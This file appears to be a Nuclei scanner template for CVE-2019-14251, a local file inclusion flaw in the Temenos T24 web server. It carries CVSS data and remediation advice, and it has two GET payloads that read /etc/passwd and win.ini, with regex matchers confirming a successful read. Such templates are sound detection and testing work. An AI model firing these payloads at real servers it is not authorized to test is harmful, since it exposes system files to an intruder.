47 lines
1.5 KiB
YAML
47 lines
1.5 KiB
YAML
id: CVE-2019-14251
|
|
|
|
info:
|
|
name: T24 Web Server - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.
|
|
reference:
|
|
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
|
|
- https://vuldb.com/?id.146815
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-14251
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-14251
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01349
|
|
epss-percentile: 0.84707
|
|
cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: temenos
|
|
product: t24
|
|
tags: cve,cve2019,temenos,lfi,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
|
|
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "for 16-bit app support"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100873a53051be0a0cb3de7d1bd3d012c6359f751130fbe553be0093de6829d8a78022100c557e6d41c88d2288e22c3da7d4d0f93d9c0be1bb9beb05f7a1957d03264ac64:922c64590222798bb761d5b6d8e72950
|